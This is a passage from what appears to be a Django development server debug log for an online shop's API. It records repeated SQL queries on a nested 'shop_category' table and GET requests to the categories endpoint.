"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 12:47:05,438 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 12:47:05,440 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 12:47:05,442 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 12:47:05,445 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 12:47:05,447 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 12:47:05,450 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 12:47:05,452 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 12:47:05,455 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 12:47:05,458 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 12:47:05,460 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 12:47:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 12:47:08,624 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-16 12:47:08,632 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:47:08,636 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 12:47:08,646 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [16/Dec/2019 12:47:08] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-16 12:47:08,653 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 12:47:08,659 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 12:47:08,666 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 12:47:08,670 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 12:47:08,674 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 12:47:08,677 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 12:47:08,680 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 12:47:08,684 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 12:47:08,690 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 12:47:08,694 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 12:47:08,699 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 12:47:08,704 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 12:47:08,711 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 12:47:08,718 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 12:47:08,723 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 12:47:08,728 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 12:47:08,733 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 12:47:08,738 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 12:47:08,742 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 12:47:08,745 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 12:47:08,748 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 12:47:08,751 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 12:47:08,754 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 12:47:08,759 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 12:47:08,762 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 12:47:08,765 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 12:47:08,769 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 12:47:08,771 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 12:47:08,775 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 12:47:08,778 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 12:47:08,780 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 12:47:08,782 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 12:47:08,785 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 12:47:08,789 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 12:47:08,792 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 12:47:08,794 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 12:47:08,797 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 12:47:08,799 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 12:47:08,802 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 12:47:08,805 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 12:47:08,808 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 12:47:08,811 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 12:47:08,817 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 12:47:08,820 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 12:47:08] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 12:47:31,142 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 12:47:31,149 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:47:31,153 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 12:47:31,156 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 12:47:31,160 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 12:47:31,162 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 12:47:31,165 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 12:47:31,167 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 12:47:31,170 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 